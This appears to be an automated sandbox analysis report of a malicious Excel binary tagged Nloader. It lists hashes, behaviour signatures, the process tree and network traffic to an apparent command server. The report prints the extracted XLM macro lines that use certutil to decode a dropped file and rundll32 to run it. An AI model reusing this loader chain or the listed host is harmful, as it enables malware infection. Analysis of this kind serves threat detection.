Analysis

  • max time kernel
    116s
  • max time network
    11s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    13/04/2021, 21:04 UTC

General

  • Target

    subscription_1617056233.xlsb

  • Size

    177KB

  • MD5

    1d1ba411ff36cdd1b1350341624ac008

  • SHA1

    becdec14b92c6d67b3aa28fdbf4293dabb7b0055

  • SHA256

    ae6dbc08e0e21b217352175f916cfd5269c4fd8d5de6bff2d0a93a366f78e8d1

  • SHA512

    89a9df6e41300e05c71af3eb45acd7cd6c3915bc511d00cc2a420c5d3a274a704798b3e48e93ffccd7813ee2a25e96a2c1c1f4d1e84ed86c144f2e79af501ef0

Score
10/10

Malware Config

Extracted

Language
xlm4.0

Source
  1: =CALL("Kernel32", "WinExec", "CJ", "cmd.exe /c certutil -decode %PUBLIC%\4123.xsg %PUBLIC%\4123.do1", 0)
  2: =CALL("Kernel32", "WinExec", "CJ", "rundll32 C:\Users\Public\4123.do1,DF1", 0)

Signatures

  • Nloader

    Simple loader that includes the keyword 'campo' in the URL used to download other families.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Nloader Payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\subscription_1617056233.xlsb
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:788
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c certutil -decode %PUBLIC%\4123.xsg %PUBLIC%\4123.do1
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1232
      • C:\Windows\SysWOW64\certutil.exe
        certutil -decode C:\Users\Public\4123.xsg C:\Users\Public\4123.do1
        3⤵
          PID:1228
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32 C:\Users\Public\4123.do1,DF1
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Loads dropped DLL
        PID:1820

    Network

    • DNS veso2.xyz (rundll32.exe)
      Remote address: 8.8.8.8:53
      Request: veso2.xyz IN A
      Response: veso2.xyz IN A 198.54.117.244
    • POST http://veso2.xyz/campo/r/r1 (rundll32.exe)
      Remote address: 198.54.117.244:80
      Request:
        POST /campo/r/r1 HTTP/1.1
        Host: veso2.xyz
        Pragma: no-cache
        Content-Length: 4
    • 198.54.117.244:80 | http://veso2.xyz/campo/r/r1 | http | rundll32.exe | 225 B / 132 B | 3 / 3
      HTTP Request: POST http://veso2.xyz/campo/r/r1
    • 8.8.8.8:53 | veso2.xyz | dns | rundll32.exe | 55 B / 71 B | 1 / 1
      DNS Request: veso2.xyz
      DNS Response: 198.54.117.244

    MITRE ATT&CK Enterprise v6


    Downloads

    • memory/788-61-0x0000000071391000-0x0000000071393000-memory.dmp (Filesize: 8KB)
    • memory/788-62-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
    • memory/788-80-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
    • memory/788-60-0x000000002F7D1000-0x000000002F7D4000-memory.dmp (Filesize: 12KB)
    • memory/1228-65-0x0000000075551000-0x0000000075553000-memory.dmp (Filesize: 8KB)
    • memory/1820-71-0x0000000000200000-0x0000000000209000-memory.dmp (Filesize: 36KB)
    • memory/1820-74-0x0000000000210000-0x0000000000217000-memory.dmp (Filesize: 28KB)
    • memory/1820-76-0x0000000000213000-0x0000000000214000-memory.dmp (Filesize: 4KB)
    • memory/1820-77-0x0000000000230000-0x0000000000235000-memory.dmp (Filesize: 20KB)
    • memory/1820-79-0x0000000000160000-0x0000000000166000-memory.dmp (Filesize: 24KB)
